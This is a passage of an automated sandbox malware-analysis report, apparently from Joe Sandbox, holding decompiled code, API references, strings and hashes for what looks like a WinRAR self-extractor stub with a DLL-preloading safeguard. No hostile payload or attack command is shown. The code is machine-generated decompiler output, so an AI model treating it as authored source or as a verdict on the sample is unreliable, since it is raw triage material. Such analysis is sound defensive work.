									if(_t292 != 9) {
										__eflags = _t292 - 3;
										_t189 = ((0 | _t292 != 0x00000003) - 0x00000001 & 0x0000000a) + 0x97;
										__eflags = _t189;
										 *(_t320 - 0x14) = _t189;
										_t316 = _t189;
									} else {
										_t316 = 0xa0;
									}
									_t190 = E0006DDD1(_t292, 0x96);
									E00079F35(_t304, E0006DDD1(_t292, _t316), _t190, 0x30);
									goto L125;
								}
							}
							_t279 = 1;
							__eflags =  *0xa8452;
							if( *0xa8452 == 0) {
								goto L26;
							}
							goto L25;
						}
						__eflags =  *0xc0cb4;
						if( *0xc0cb4 == 0) {
							goto L23;
						} else {
							__eflags =  *0xc0cb5;
							_t256 = _t149 & 0xffffff00 |  *0xc0cb5 == 0x00000000;
							__eflags = _t256;
							 *0xc0cb5 = _t256;
							_t257 = E0006DDD1((0 | _t256 != 0x00000000) + 0xe6, (0 | _t256 != 0x00000000) + 0xe6);
							_t279 = 1;
							SetDlgItemTextW(_t304, 1, _t257);
							while(1) {
								__eflags =  *0xc0cb5;
								if( *0xc0cb5 == 0) {
									goto L125;
								}
								__eflags =  *0xa8450;
								if( *0xa8450 != 0) {
									goto L125;
								}
								_t261 = GetMessageW(_t320 - 0x74, 0, 0, 0);
								__eflags = _t261;
								if(_t261 == 0) {
									goto L125;
								} else {
									_t263 = IsDialogMessageW(_t304, _t320 - 0x74);
									__eflags = _t263;
									if(_t263 == 0) {
										TranslateMessage(_t320 - 0x74);
										DispatchMessageW(_t320 - 0x74);
									}
									continue;
								}
							}
							goto L125;
						}
					}
					_t268 = _t149 - 1;
					__eflags = _t268;
					if(_t268 == 0) {
						_t279 = 1;
						__eflags =  *0xa8454;
						 *0xa8450 = 1;
						if( *0xa8454 == 0) {
							goto L12;
						}
						__eflags =  *0xa845c;
						if( *0xa845c != 0) {
							goto L125;
						}
						goto L12;
					}
					__eflags = _t268 == 0x65;
					if(_t268 == 0x65) {
						_t272 = E00061241(_t304, E0006DDD1(_t287, 0x64), _t320 - 0x1174);
						__eflags = _t272;
						if(_t272 != 0) {
							SetDlgItemTextW(_t304, 0x66, _t320 - 0x1174);
						}
						goto L1;
					}
					goto L7;
				}
				L1:
				_t116 = 1;
				goto L126;
			}

0x0007aee0
0x0007aee0
0x0007aee5
0x0007aeef
0x0007aef5
0x0007aef9
0x0007aefd
0x0007af16
0x0007af20
0x0007af20
0x0007af26
0x0007b5cb
0x0007b5cc
0x0007b5d1
0x0007b5d8
0x0007b5d9
0x0007b5df
0x0007b5e5
0x0007b5e7
0x0007b5f1
0x0007b5f1
0x0007b5f7
0x0007b5fc
0x0007b5fe
0x0007b60b
0x0007b60b
0x0007b614
0x0007b627
0x0007b62a
0x0007b63c
0x0007b644
0x0007b64a
0x0007b652
0x0007b654
0x0007b657
0x0007b65c
0x0007b65e
0x0007b65e
0x0007b666
0x0007b66d
0x0007b672
0x0007b677
0x0007b67c
0x0007b681
0x0007b682
0x0007b689
0x0007b68e
0x0007b690
0x0007b692
0x0007b692
0x0007b698
0x0007b69f
0x0007b6a1
0x0007b6a3
0x0007b6a9
0x0007b6aa
0x0007b6aa
0x0007b6af
0x0007b6b6
0x0007b6c6
0x0007b6d9
0x0007b6d9
0x0007b6df
0x0007b6e6
0x0007b797
0x0007b797
0x0007b79e
0x0007b847
0x0007b847
0x0007b84e
0x0007b853
0x0007b853
0x0007b859
0x0007b860
0x0007b867
0x0007b871
0x0007b871
0x0007b876
0x0007b87b
0x0007b87d
0x0007b87f
0x0007b886
0x0007b888
0x0007b88a
0x0007b88b
0x0007b890
0x0007b891
0x0007b893
0x0007b89d
0x0007b895
0x0007b895
0x0007b895
0x0007b893
0x0007b886
0x0007b8a3
0x0007b8aa
0x0007b8b9
0x0007b8b9
0x00000000
0x0007b8aa
0x0007b7a4
0x0007b7ab
0x00000000
0x00000000
0x0007b7b1
0x0007b7b8
0x00000000
0x00000000
0x0007b7be
0x0007b7c0
0x0007b7c5
0x0007b7cc
0x0007b7cc
0x0007b7d2
0x0007b7dd
0x0007b7dd
0x0007b7e3
0x0007b7ee
0x0007b7ff
0x0007b817
0x00000000
0x0007b817
0x0007b7e5
0x0007b7ec
0x00000000
0x00000000
0x00000000
0x0007b7ec
0x0007b7d4
0x0007b7db
0x00000000
0x00000000
0x00000000
0x0007b81c
0x0007b81c
0x0007b81d
0x0007b81d
0x0007b825
0x0007b83f
0x0007b844
0x00000000
0x0007b6ec
0x0007b6ec
0x0007b6ee
0x0007b6f4
0x0007b6f5
0x0007b6fa
0x0007b6ff
0x0007b701
0x0007b703
0x0007b70a
0x0007b70c
0x0007b720
0x0007b72b
0x0007b730
0x0007b730
0x0007b70a
0x0007b731
0x0007b737
0x0007b78a
0x0007b78a
0x0007b78b
0x0007b791
0x0007b792
0x00000000
0x0007b739
0x0007b73a
0x0007b740
0x0007b746
0x00000000
0x00000000
0x0007b748
0x0007b74f
0x00000000
0x00000000
0x0007b751
0x0007b753
0x0007b759
0x0007b75a
0x0007b75f
0x0007b766
0x00000000
0x00000000
0x0007b77c
0x0007b782
0x0007b784
0x0007b06b
0x0007b06b
0x0007b071
0x0007b071
0x0007af96
0x0007af97
0x0007b8bf
0x0007b8bf
0x0007b8c1
0x0007b8c7
0x0007b8d1
0x0007b8d1
0x00000000
0x0007b784
0x0007b737
0x0007b6e6
0x0007af2c
0x0007af2f
0x0007af43
0x0007af43
0x00000000
0x0007af43
0x0007af34
0x0007af34
0x0007af37
0x0007afa2
0x0007afa9
0x0007b041
0x0007b050
0x0007b056
0x0007b05d
0x0007b077
0x0007b07e
0x0007b09a
0x0007b09c
0x0007b0a2
0x0007b0ad
0x0007b0bf
0x0007b0bf
0x0007b0c6
0x0007b0cc
0x0007b0d3
0x0007b0ed
0x0007b101
0x0007b10e
0x0007b131
0x0007b136
0x0007b13f
0x0007b140
0x0007b141
0x0007b0d5
0x0007b0df
0x0007b0e0
0x0007b0e1
0x0007b0e6
0x0007b0e6
0x0007b146
0x0007b14d
0x0007b156
0x0007b156
0x0007b15b
0x0007b164
0x0007b165
0x0007b168
0x0007b16f
0x0007b170
0x0007b172
0x0007b189
0x0007b195
0x0007b197
0x0007b19a
0x0007b19c
0x0007b1b3
0x0007b1b3
0x0007b1b6
0x0007b1b6
0x0007b1bc
0x0007b1be
0x0007b22d
0x0007b22d
0x0007b231
0x0007b471
0x0007b477
0x0007b481
0x0007b493
0x0007b49d
0x0007b4aa
0x0007b4b9
0x0007b4bb
0x0007b4bd
0x0007b4c8
0x0007b4c8
0x0007b4d1
0x0007b4d1
0x0007b4d7
0x0007b4d9
0x0007b4df
0x0007b4e0
0x0007b4e5
0x0007b4e7
0x0007b4ed
0x0007b4ee
0x0007b4f3
0x0007b4f8
0x0007b4f9
0x0007b4ff
0x0007b504
0x0007b506
0x0007b50c
0x0007b513
0x0007b514
0x0007b519
0x0007b520
0x0007b522
0x0007b529
0x0007b52b
0x0007b532
0x0007b534
0x0007b536
0x0007b53c
0x0007b53d
0x0007b53d
0x0007b532
0x0007b529
0x0007b545
0x0007b54a
0x0007b54a
0x0007b551
0x00000000
0x0007b551
0x0007b237
0x0007b23e
0x0007b23e
0x0007b241
0x0007b241
0x0007b243
0x0007b247
0x0007b249
0x0007b407
0x0007b407
0x0007b40b
0x0007b41b
0x0007b434
0x0007b442
0x0007b45c
0x0007b461
0x0007b461
0x0007af94
0x0007af94
0x00000000
0x0007af94
0x0007b259
0x0007b26a
0x0007b270
0x0007b275
0x0007b292
0x0007b297
0x0007b29a
0x0007b2a7
0x0007b2ae
0x0007b2b7
0x0007b2cf
0x0007b2d2
0x0007b2d9
0x0007b2dc
0x0007b2df
0x0007b2ec
0x0007b2ee
0x0007b2f1
0x0007b2f3
0x0007b37e
0x0007b2f9
0x0007b2f9
0x0007b300
0x0007b306
0x0007b308
0x0007b315
0x0007b315
0x0007b321
0x0007b32d
0x0007b339
0x0007b344
0x0007b34b
0x0007b350
0x0007b36e
0x0007b371
0x0007b376
0x0007b376
0x0007b385
0x0007b399
0x0007b3aa
0x0007b3af
0x0007b3b1
0x0007b3eb
0x0007b3ee
0x00000000
0x0007b3b3
0x0007b3bb
0x0007b3c1
0x0007b3c1
0x0007b3c1
0x0007b3c5
0x0007b3c8
0x0007b3c8
0x0007b3cb
0x00000000
0x00000000
0x0007b3cf
0x0007b3d8
0x0007b3d9
0x0007b3dc
0x0007b3df
0x00000000
0x00000000
0x00000000
0x0007b3df
0x0007b3e4
0x0007b3f1
0x0007b3f1
0x0007b3f5
0x0007b3f8
0x0007b401
0x0007b401
0x00000000
0x0007b3f5
0x0007b3b1
0x0007b1c0
0x0007b1c2
0x00000000
0x00000000
0x0007b1d8
0x0007b1dd
0x0007b1e6
0x0007b1eb
0x0007b1f5
0x0007b1f7
0x0007b1fe
0x0007b203
0x0007b206
0x0007b208
0x0007b20a
0x0007b210
0x0007b213
0x0007b215
0x0007b215
0x0007b213
0x0007b218
0x0007b218
0x0007b218
0x0007b222
0x0007b227
0x00000000
0x0007b227
0x0007b19e
0x0007b1a4
0x0007b1a7
0x0007b1aa
0x00000000
0x00000000
0x0007b1ac
0x0007b1ae
0x00000000
0x0007b174
0x0007b174
0x0007b17a
0x0007b17d
0x0007b184
0x0007b186
0x00000000
0x0007b186
0x0007b17f
0x0007b182
0x00000000
0x00000000
0x00000000
0x0007b182
0x0007b080
0x0007b082
0x0007b083
0x0007b085
0x0007b556
0x0007b556
0x0007b55d
0x00000000
0x00000000
0x0007b563
0x0007b565
0x00000000
0x00000000
0x0007b570
0x0007b57e
0x0007b584
0x0007b58a
0x0007b58d
0x0007b598
0x0007b5a2
0x0007b5a2
0x0007b5a7
0x0007b5aa
0x0007b58f
0x0007b58f
0x0007b58f
0x0007b5b3
0x0007b5c1
0x00000000
0x0007b5c1
0x0007b07e
0x0007b061
0x0007b062
0x0007b069
0x00000000
0x00000000
0x00000000
0x0007b069
0x0007afaf
0x0007afb6
0x00000000
0x0007afbc
0x0007afbc
0x0007afc3
0x0007afc8
0x0007afca
0x0007afd9
0x0007afe1
0x0007afe4
0x0007b033
0x0007b033
0x0007b03a
0x0007b03c
0x0007b03c
0x0007afec
0x0007aff3
0x00000000
0x00000000
0x0007b002
0x0007b008
0x0007b00a
0x00000000
0x0007b010
0x0007b015
0x0007b01b
0x0007b01d
0x0007b023
0x0007b02d
0x0007b02d
0x00000000
0x0007b01d
0x0007b00a
0x00000000
0x0007b033
0x0007afb6
0x0007af39
0x0007af39
0x0007af3c
0x0007af77
0x0007af78
0x0007af7f
0x0007af85
0x00000000
0x00000000
0x0007af87
0x0007af8e
0x00000000
0x00000000
0x00000000
0x0007af8e
0x0007af3e
0x0007af41
0x0007af5a
0x0007af5f
0x0007af61
0x0007af6d
0x0007af6d
0x00000000
0x0007af61
0x00000000
0x0007af41
0x0007af18
0x0007af1a
0x00000000

APIs

__EH_prolog.LIBCMT ref: 0007AEE5

Part of subcall function 0006130B: GetDlgItem.USER32(00000000,00003021), ref: 0006134F
Part of subcall function 0006130B: SetWindowTextW.USER32(00000000,000935B4), ref: 00061365

Strings

STARTDLG, xrefs: 0007AF04
__tmp_rar_sfx_access_check_%u, xrefs: 0007B1CB
-el -s2 "-d%s" "-sp%s", xrefs: 0007B281
<, xrefs: 0007B29A
"%s"%s, xrefs: 0007B423
winrarsfxmappingfile.tmp, xrefs: 0007B2BC
C:\Users\user\Desktop, xrefs: 0007B2DF
LICENSEDLG, xrefs: 0007B771
@, xrefs: 0007B2A7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: H_prologItemTextWindow
String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
API String ID: 810644672-1650746426
Opcode ID: 491d0a0e7f37099db9c5cc05339d6b5217c092c0978b8311f7080401e0c15157
Instruction ID: 0c716e0b3712d4af6037e5db1e6b845a3fdc7f1f8b0395edeeac3dfa6c7bd3f0
Opcode Fuzzy Hash: 491d0a0e7f37099db9c5cc05339d6b5217c092c0978b8311f7080401e0c15157
Instruction Fuzzy Hash: E342C571D44245AFFB21ABA09C8AFFE7BBDAB06700F048155F609A61D2CB7C4D44CB66

Uniqueness

Uniqueness Score: -1.00%

Function 000700CF Relevance: 98.3, APIs: 22, Strings: 34, Instructions: 317
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 71%

			E000700CF(void* __edx, CHAR* _a4, CHAR* _a8, CHAR* _a12, CHAR* _a16, CHAR* _a20, CHAR* _a24, CHAR* _a28, CHAR* _a32, CHAR* _a36, CHAR* _a40, CHAR* _a44, CHAR* _a48, CHAR* _a52, CHAR* _a56, CHAR* _a60, CHAR* _a64, CHAR* _a68, CHAR* _a72, CHAR* _a76, CHAR* _a80, CHAR* _a84, CHAR* _a88, CHAR* _a92, CHAR* _a96, CHAR* _a100, CHAR* _a104, CHAR* _a108, CHAR* _a112, CHAR* _a116, CHAR* _a120, CHAR* _a124, CHAR* _a128, CHAR* _a132, CHAR* _a136, CHAR* _a140, CHAR* _a144, CHAR* _a148, CHAR* _a152, CHAR* _a156, CHAR* _a160, CHAR* _a164, CHAR* _a168, CHAR* _a172, CHAR* _a176, CHAR* _a180, CHAR* _a184, CHAR* _a188, CHAR* _a192, CHAR* _a196, CHAR* _a200, CHAR* _a204, CHAR* _a208, CHAR* _a212, CHAR* _a216, CHAR* _a220, CHAR* _a224, CHAR* _a228, CHAR* _a232, CHAR* _a236, CHAR* _a240, char _a244, char _a248, short _a752, short _a756, char _a764, short _a768, char _a4844, char _a4848, void _a4856, char _a4860, short _a4864, char _a9148, char _a9156, void _a13256, signed char _a46028) {
				long _v0;
				long _v8;
				char* _t115;
				void* _t123;
				int _t127;
				long _t138;
				int _t164;
				_Unknown_base(*)()* _t173;
				signed char _t180;
				intOrPtr _t194;
				long _t196;
				void* _t197;
				_Unknown_base(*)()* _t198;
				struct HINSTANCE__* _t200;
				signed int _t202;
				signed int _t204;
				void* _t205;
				_Unknown_base(*)()* _t206;
				signed int _t207;
				int _t208;
				void* _t210;

				E0007E360();
				_push(_t207);
				_t180 = 0;
				_t200 = GetModuleHandleW(L"kernel32");
				if(_t200 == 0) {
					L5:
					_t115 =  *0x9e080; // 0x93b54
					_t208 = _t207 | 0xffffffff;
					_a4 = L"version.dll";
					_t201 = 0x800;
					_a8 = L"DXGIDebug.dll";
					_a12 = L"sfc_os.dll";
					_a16 = L"SSPICLI.DLL";
					_a20 = L"rsaenh.dll";
					_a24 = L"UXTheme.dll";
					_a28 = L"dwmapi.dll";
					_a32 = L"cryptbase.dll";
					_a36 = L"lpk.dll";
					_a40 = L"usp10.dll";
					_a44 = L"clbcatq.dll";
					_a48 = L"comres.dll";
					_a52 = L"ws2_32.dll";
					_a56 = L"ws2help.dll";
					_a60 = L"psapi.dll";
					_a64 = L"ieframe.dll";
					_a68 = L"ntshrui.dll";
					_a72 = L"atl.dll";
					_a76 = L"setupapi.dll";
					_a80 = L"apphelp.dll";
					_a84 = L"userenv.dll";
					_a88 = L"netapi32.dll";
					_a92 = L"shdocvw.dll";
					_a96 = L"crypt32.dll";
					_a100 = L"msasn1.dll";
					_a104 = L"cryptui.dll";
					_a108 = L"wintrust.dll";
					_a112 = L"shell32.dll";
					_a116 = L"secur32.dll";
					_a120 = L"cabinet.dll";
					_a124 = L"oleaccrc.dll";
					_a128 = L"ntmarta.dll";
					_a132 = L"profapi.dll";
					_a136 = L"WindowsCodecs.dll";
					_a140 = L"srvcli.dll";
					_a144 = L"cscapi.dll";
					_a148 = L"slc.dll";
					_a152 = L"imageres.dll";
					_a156 = L"dnsapi.DLL";
					_a160 = L"iphlpapi.DLL";
					_a164 = L"WINNSI.DLL";
					_a168 = L"netutils.dll";
					_a172 = L"mpr.dll";
					_a176 = L"devrtl.dll";
					_a180 = L"propsys.dll";
					_a184 = L"mlang.dll";
					_a188 = L"samcli.dll";
					_a192 = L"samlib.dll";
					_a196 = L"wkscli.dll";
					_a200 = L"dfscli.dll";
					_a204 = L"browcli.dll";
					_a208 = L"rasadhlp.dll";
					_a212 = L"dhcpcsvc6.dll";
					_a216 = L"dhcpcsvc.dll";
					_a220 = L"XmlLite.dll";
					_a224 = L"linkinfo.dll";
					_a228 = L"cryptsp.dll";
					_a232 = L"RpcRtRemote.dll";
					_a236 = L"aclui.dll";
					_a240 = L"dsrole.dll";
					_a244 = L"peerdist.dll";
					if( *_t115 == 0x78) {
						L14:
						GetModuleFileNameW(0,  &_a768, _t201);
						E0006FE56( &_a9156, E0006BC85(_t223,  &_a768), _t201);
						_t194 = 0;
						_t202 = 0;
						do {
							if(E0006ACF5() < 0x600) {
								_t123 = 0;
								__eflags = 0;
							} else {
								_t123 = E00070085( *((intOrPtr*)(_t210 + 0x14 + _t202 * 4))); // executed
							}
							if(_t123 == 0) {
								L20:
								_push(0x800);
								E0006BCFB(_t227,  &_a768,  *((intOrPtr*)(_t210 + 0x18 + _t202 * 4)));
								_t127 = GetFileAttributesW( &_a756); // executed
								if(_t127 != _t208) {
									_t194 =  *((intOrPtr*)(_t210 + 0x14 + _t202 * 4));
									L24:
									if(_t180 != 0) {
										L30:
										_t234 = _t194;
										if(_t194 == 0) {
											return _t127;
										}
										E0006BCCF(_t234,  &_a764);
										if(E0006ACF5() < 0x600) {
											_push( &_a9156);
											_push( &_a764);
											E0006400A( &_a4860, 0x864, L"Please remove %s from %s folder. It is unsecure to run %s until it is done.", _t194);
											_t210 = _t210 + 0x18;
											_t127 = AllocConsole();
											__eflags = _t127;
											if(_t127 != 0) {
												__imp__AttachConsole(GetCurrentProcessId());
												_t138 = E000835B3( &_a4856);
												WriteConsoleW(GetStdHandle(0xfffffff4),  &_a4856, _t138,  &_v8, 0);
												Sleep(0x2710);
												_t127 = FreeConsole();
											}
										} else {
											E00070085(L"dwmapi.dll");
											E00070085(L"uxtheme.dll");
											_push( &_a9148);
											_push( &_a756);
											E0006400A( &_a4848, 0x864, E0006DDD1(_t182, 0xf1), _t194);
											_t210 = _t210 + 0x18;
											_t127 = E00079F35(0,  &_a4844, E0006DDD1(_t182, 0xf0), 0x30);
										}
										ExitProcess(0);
									}
									_t204 = 0;
									while(1) {
										_push(0x800);
										E0006BCFB(0,  &_a764,  *((intOrPtr*)(_t210 + 0x38 + _t204 * 4)));
										_t127 = GetFileAttributesW( &_a752);
										if(_t127 != _t208) {
											break;
										}
										_t204 = _t204 + 1;
										if(_t204 < 0x35) {
											continue;
										}
										goto L30;
									}
									_t100 = _t204 * 4; // 0x93c6c
									_t194 =  *((intOrPtr*)(_t210 + _t100 + 0x34));
									goto L30;
								}
							} else {
								_t127 = CompareStringW(0x400, 0x1001,  *(_t210 + 0x20 + _t202 * 4), _t208, L"DXGIDebug.dll", _t208); // executed
								_t227 = _t127 - 2;
								if(_t127 != 2) {
									goto L21;
								}
								goto L20;
							}
							L21:
							_t202 = _t202 + 1;
						} while (_t202 < 8);
						goto L24;
					}
					_t196 = E000870DD(_t182, _t115);
					_pop(_t182);
					if(_t196 == 0) {
						goto L14;
					}
					GetModuleFileNameW(0,  &_a4864, 0x800);
					_t205 = CreateFileW( &_a4864, 0x80000000, 1, 0, 3, 0, 0);
					if(_t205 == _t208 || SetFilePointer(_t205, _t196, 0, 0) != _t196) {
						L13:
						CloseHandle(_t205);
						_t201 = 0x800;
						goto L14;
					} else {
						_t164 = ReadFile(_t205,  &_a13256, 0x7ffe,  &_v0, 0);
						_t222 = _t164;
						if(_t164 == 0) {
							goto L13;
						}
						_t182 = 0;
						_push(0x104);
						 *((short*)(_t210 + 0x33dc + (_v0 >> 1) * 2)) = 0;
						_push( &_a248);
						_push( &_a13256);
						while(1) {
							_t197 = E0006FBD8(_t222);
							_t223 = _t197;
							if(_t197 == 0) {
								goto L13;
							}
							E00070085( &_a248);
							_push(0x104);
							_push( &_a244);
							_push(_t197);
						}
						goto L13;
					}
				}
				_t173 = GetProcAddress(_t200, "SetDllDirectoryW");
				_t180 = _a46028;
				_t198 = _t173;
				if(_t198 != 0) {
					asm("sbb ecx, ecx");
					_t182 = _t198;
					 *0x93260( ~(_t180 & 0x000000ff) & 0x000935b4);
					 *_t198();
				}
				_t206 = GetProcAddress(_t200, "SetDefaultDllDirectories");
				if(_t206 != 0) {
					_t182 = _t206;
					 *0x93260(((0 | _t180 == 0x00000000) - 0x00000001 & 0xfffff800) + 0x1000);
					 *_t206();
					_t180 = 1;
				}
				goto L5;
			}

0x000700d4
0x000700da
0x000700e2
0x000700ea
0x000700ee
0x00070154
0x00070154
0x00070159
0x0007015c
0x00070164
0x00070169
0x00070171
0x0007017c
0x00070184
0x0007018c
0x00070194
0x0007019c
0x000701a4
0x000701ac
0x000701b4
0x000701bc
0x000701c4
0x000701cc
0x000701d4
0x000701dc
0x000701e4
0x000701ec
0x000701f4
0x000701fc
0x00070204
0x0007020c
0x00070214
0x0007021c
0x00070224
0x0007022c
0x00070234
0x0007023c
0x00070247
0x00070252
0x0007025d
0x00070268
0x00070273
0x0007027e
0x00070289
0x00070294
0x0007029f
0x000702aa
0x000702b5
0x000702c0
0x000702cb
0x000702d6
0x000702e1
0x000702ec
0x000702f7
0x00070302
0x0007030d
0x00070318
0x00070323
0x0007032e
0x00070339
0x00070344
0x0007034f
0x0007035a
0x00070365
0x00070370
0x0007037b
0x00070386
0x00070391
0x0007039c
0x000703a7
0x000703b2
0x00070484
0x0007048f
0x000704ac
0x000704b1
0x000704b3
0x000704b5
0x000704bf
0x000704cc
0x000704cc
0x000704c1
0x000704c5
0x000704c5
0x000704d0
0x000704f2
0x000704f2
0x00070503
0x00070510
0x00070518
0x00070522
0x00070526
0x00070528
0x00070560
0x00070560
0x00070562
0x00070679
0x00070679
0x00070570
0x0007057f
0x000705ee
0x000705f6
0x0007060a
0x0007060f
0x00070612
0x00070618
0x0007061a
0x00070623
0x00070638
0x00070650
0x0007065b
0x00070661
0x00070661
0x00070581
0x00070586
0x00070590
0x0007059c
0x000705a4
0x000705be
0x000705c3
0x000705dd
0x000705dd
0x00070669
0x00070669
0x0007052a
0x0007052c
0x0007052c
0x0007053d
0x0007054a
0x00070552
0x00000000
0x00000000
0x00070554
0x00070558
0x00000000
0x00000000
0x00000000
0x0007055a
0x0007055c
0x0007055c
0x00000000
0x0007055c
0x000704d2
0x000704e7
0x000704ed
0x000704f0
0x00000000
0x00000000
0x00000000
0x000704f0
0x0007051a
0x0007051a
0x0007051b
0x00000000
0x00070520
0x000703be
0x000703c0
0x000703c3
0x00000000
0x00000000
0x000703d4
0x000703f6
0x000703fa
0x00070478
0x00070479
0x0007047f
0x00000000
0x0007040c
0x00070421
0x00070427
0x00070429
0x00000000
0x00000000
0x00070431
0x00070433
0x00070438
0x00070447
0x0007044f
0x0007046d
0x00070472
0x00070474
0x00070476
0x00000000
0x00000000
0x0007045a
0x0007045f
0x0007046b
0x0007046c
0x0007046c
0x00000000
0x0007046d
0x000703fa
0x000700f6
0x000700fc
0x00070103
0x00070107
0x0007010e
0x00070117
0x00070119
0x0007011f
0x0007011f
0x0007012d
0x00070131
0x00070148
0x0007014a
0x00070150
0x00070152
0x00070152
0x00000000

APIs

GetModuleHandleW.KERNEL32(kernel32), ref: 000700E4
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 000700F6
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00070127
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 000703D4
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000703F0
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00070402
ReadFile.KERNEL32(00000000,?,00007FFE,00093BA4,00000000), ref: 00070421
CloseHandle.KERNEL32(00000000), ref: 00070479
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0007048F
CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 000704E7
GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 00070510
GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 0007054A

Part of subcall function 00070085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 000700A0
Part of subcall function 00070085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0006EB86,Crypt32.dll,00000000,0006EC0A,?,?,0006EBEC,?,?,?), ref: 000700C2

_swprintf.LIBCMT ref: 000705BE
_swprintf.LIBCMT ref: 0007060A

Part of subcall function 0006400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0006401D

AllocConsole.KERNEL32 ref: 00070612
GetCurrentProcessId.KERNEL32 ref: 0007061C
AttachConsole.KERNEL32(00000000), ref: 00070623
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00070649
WriteConsoleW.KERNEL32(00000000), ref: 00070650
Sleep.KERNEL32(00002710), ref: 0007065B
FreeConsole.KERNEL32 ref: 00070661
ExitProcess.KERNEL32 ref: 00070669

Strings

|<, xrefs: 000701AC
SetDefaultDllDirectories, xrefs: 00070121
\A, xrefs: 000703A7
X>, xrefs: 00070252
p>, xrefs: 0007025D
DA, xrefs: 0007039C
DXGIDebug.dll, xrefs: 00070169, 000704D3
?, xrefs: 000702AA
T?, xrefs: 000702C0
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 000705F8
<, xrefs: 0007018C
@>, xrefs: 00070247
x=, xrefs: 00070204
SetDllDirectoryW, xrefs: 000700F0
D=, xrefs: 000701F4
>, xrefs: 00070289
uxtheme.dll, xrefs: 0007058B
l<, xrefs: 0007055C
p@, xrefs: 00070344
<?, xrefs: 000702B5
?, xrefs: 00070302
0A, xrefs: 00070391
kernel32, xrefs: 000700DD
@@, xrefs: 0007032E
T;, xrefs: 00070154
4=, xrefs: 000701EC
(>, xrefs: 0007023C
p?, xrefs: 000702CB
(@, xrefs: 00070323
X@, xrefs: 00070339
P<, xrefs: 0007019C
`=, xrefs: 000701FC
8<, xrefs: 00070194
dwmapi.dll, xrefs: 00070581

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
String ID: <$ ?$(>$(@$0A$4=$8<$<?$@>$@@$D=$DA$DXGIDebug.dll$P<$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T;$T?$X>$X@$\A$`=$dwmapi.dll$kernel32$l<$p>$p?$p@$uxtheme.dll$x=$|<$>$?
API String ID: 1201351596-1913382418
Opcode ID: 879ec0a73ed5d00f252e33af7aaffd0536f871787eb553e9fc3de96963f02748
Instruction ID: a69b0482f8fe0ee80accf3a2f2ca36bc13c9b41a9934790ccba9583dd498eed5
Opcode Fuzzy Hash: 879ec0a73ed5d00f252e33af7aaffd0536f871787eb553e9fc3de96963f02748
Instruction Fuzzy Hash: DBD190B1508384EBDB30DF50D859B9FBBE8BFC4704F40491DF68996190DBB88A489F66

Uniqueness

Uniqueness Score: -1.00%

Function 0007BDF5 Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 429
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 45%

			E0007BDF5(void* __edx) {
				intOrPtr _t226;
				void* _t231;
				intOrPtr _t287;
				void* _t300;
				signed int _t302;
				void* _t306;
				signed int _t307;
				void* _t311;

				_t300 = __edx;
				E0007E28C(E00092053, _t311);
				_t226 = 0x1bd4c;
				E0007E360();
				if( *((intOrPtr*)(_t311 + 0xc)) == 0) {
					L177:
					 *[fs:0x0] =  *((intOrPtr*)(_t311 - 0xc));
					return _t226;
				}
				_push(0x1000);
				_push(_t311 - 0x15);
				_push(_t311 - 0xd);
				_push(_t311 - 0x3508);
				_push(_t311 - 0xfd58);
				_push( *((intOrPtr*)(_t311 + 0xc)));
				_t226 = E0007AA36();
				 *((intOrPtr*)(_t311 + 0xc)) = 0x1bd4c;
				if(0x1bd4c != 0) {
